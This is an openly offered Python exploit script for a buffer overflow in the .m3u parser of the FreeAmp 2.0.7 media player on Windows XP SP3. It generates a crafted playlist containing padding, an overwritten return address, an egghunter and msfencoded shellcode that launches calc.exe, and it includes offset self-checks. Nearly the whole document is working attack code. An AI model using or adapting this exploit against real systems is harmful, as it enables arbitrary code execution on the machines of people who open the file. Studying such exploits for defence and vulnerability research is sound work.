# Title : FreeAmp 2.0.7 .m3u Buffer Overflow
# Published : 2010-12-11
# Author : zota
# Exploit Title: FreeAmp 2.0.7 .m3u Buffer Overflow - Egghunter
# Google Dork: N/A
# Date: 11/12/2010
# Author: zota (Thanks to Andrew; andras.kabai@cert-hungary.hu)
# Software Link: http://letoltes.szoftverbazis.hu/bfc5ec1d5e80cee5b5d3f78459113ed93c51f649/4d03800a/freeamp-v2-0-7-JI2/freeampsetup_2_0_7.exe
# Version: 2.0.7
# Tested on: Windows XP SP3 HUN (Hungarian build; the kernel32.dll "jmp esp" address used below is specific to that build and must be re-located for any other version/locale)
# CVE : N/A
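"""Generate crash.m3u, a playlist that overflows the FreeAmp 2.0.7 .m3u parser.

Layout of the 15000-byte file (offsets from the start of the file):

    0      "A" * 14654   filler
    14654  egg + egg     "H4CKH4CK", the doubled tag the egghunter scans for
    14662  payload       228-byte windows/exec CMD=calc.exe (msfencode output)
    14890  "A" * 17      filler up to the saved return address
    14907  eip           jmp esp in kernel32.dll, little-endian
    14911  nop           16 x 0x43 (inc ebx); assumed to be where jmp esp lands
    14927  egghunter     32 bytes, locates egg+egg and jumps to the bytes after it
    14959  "D" * 41      trailing filler

The script only writes the file; nothing is executed here. All byte strings
are bytes literals and the file is opened in binary mode so the output is
identical under Python 2 and 3 and no newline translation touches it.
"""
import struct

filename = "crash.m3u"

# Offsets that the crash analysis fixed: where the saved return address sits
# and how long the playlist entry is.
EIP_OFFSET = 14907
TOTAL_LEN = 15000

# 4-byte tag; written twice back to back in front of the shellcode because the
# hunter compares two consecutive dwords.
egg = b"H4CK"

# 32-byte egghunter. The "push 2 / pop eax / int 0x2e" sequence (6a 02 58 cd 2e)
# is the classic NtAccessCheckAndAuditAlarm-based hunter: it probes memory page
# by page and, once egg+egg is found, jumps to the byte after the second tag.
# Contains none of the bad chars 0x00/0x0a/0x0d.
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
    b"\xb8" + egg +  # mov eax, <egg>
    b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

padding = b"A" * 14654

# Saved return address -> jmp esp in kernel32.dll of the tested build
# (0x7c86467b, Windows XP SP3 HUN). XP has no ASLR, but the address is
# build/locale specific; re-find it for any other kernel32.dll.
eip = struct.pack("<I", 0x7c86467b)

# 16 bytes executed right after the jmp esp. 0x43 decodes as "inc ebx", which
# is harmless, so it serves as a NOP sled without using 0x90.
nop = b"C" * 16

# msfpayload windows/exec CMD=calc.exe R | msfencode -b "\x00\x0a\x0d"
# -> 228 bytes (the leading fpu/fnstenv stub is the encoder's GetPC).
payload = (
    b"\xdb\xcf\xd9\x74\x24\xf4\xba\xf0\x1b\xe7\xdb\x5b\x31\xc9"
    b"\xb1\x33\x31\x53\x18\x03\x53\x18\x83\xc3\xf4\xf9\x12\x27"
    b"\x1c\x74\xdc\xd8\xdc\xe7\x54\x3d\xed\x35\x02\x35\x5f\x8a"
    b"\x40\x1b\x53\x61\x04\x88\xe0\x07\x81\xbf\x41\xad\xf7\x8e"
    b"\x52\x03\x38\x5c\x90\x05\xc4\x9f\xc4\xe5\xf5\x6f\x19\xe7"
    b"\x32\x8d\xd1\xb5\xeb\xd9\x43\x2a\x9f\x9c\x5f\x4b\x4f\xab"
    b"\xdf\x33\xea\x6c\xab\x89\xf5\xbc\x03\x85\xbe\x24\x28\xc1"
    b"\x1e\x54\xfd\x11\x62\x1f\x8a\xe2\x10\x9e\x5a\x3b\xd8\x90"
    b"\xa2\x90\xe7\x1c\x2f\xe8\x20\x9a\xcf\x9f\x5a\xd8\x72\x98"
    b"\x98\xa2\xa8\x2d\x3d\x04\x3b\x95\xe5\xb4\xe8\x40\x6d\xba"
    b"\x45\x06\x29\xdf\x58\xcb\x41\xdb\xd1\xea\x85\x6d\xa1\xc8"
    b"\x01\x35\x72\x70\x13\x93\xd5\x8d\x43\x7b\x8a\x2b\x0f\x6e"
    b"\xdf\x4a\x52\xe5\x1e\xde\xe8\x40\x20\xe0\xf2\xe2\x48\xd1"
    b"\x79\x6d\x0f\xee\xab\xc9\xff\xa4\xf6\x78\x97\x60\x63\x39"
    b"\xfa\x92\x59\x7e\x02\x11\x68\xff\xf1\x09\x19\xfa\xbe\x8d"
    b"\xf1\x76\xaf\x7b\xf6\x25\xd0\xa9\x95\xa8\x42\x31\x74\x4e"
    b"\xe2\xd0\x88\x9a"
)

# Assemble the file: tag + shellcode, fill up to the saved-EIP slot, then the
# return address, the sled and the hunter, then filler to the full length.
buffer = padding + egg + egg + payload
buffer += b"A" * (EIP_OFFSET - len(buffer))
buffer += eip + nop + egghunter
buffer += b"D" * (TOTAL_LEN - len(buffer))

# Layout self-check. A negative filler count silently multiplies to b"" and
# would shift the return address off the saved-EIP slot, so verify the two
# offsets the exploit depends on before writing anything.
if len(buffer) != TOTAL_LEN or buffer[EIP_OFFSET:EIP_OFFSET + len(eip)] != eip:
    raise ValueError("buffer layout does not match the expected offsets")
if len(egghunter) != 32 or len(payload) != 228:
    raise ValueError("egghunter/payload size differs from the documented size")

if __name__ == "__main__":
    with open(filename, "wb") as textfile:
        textfile.write(buffer)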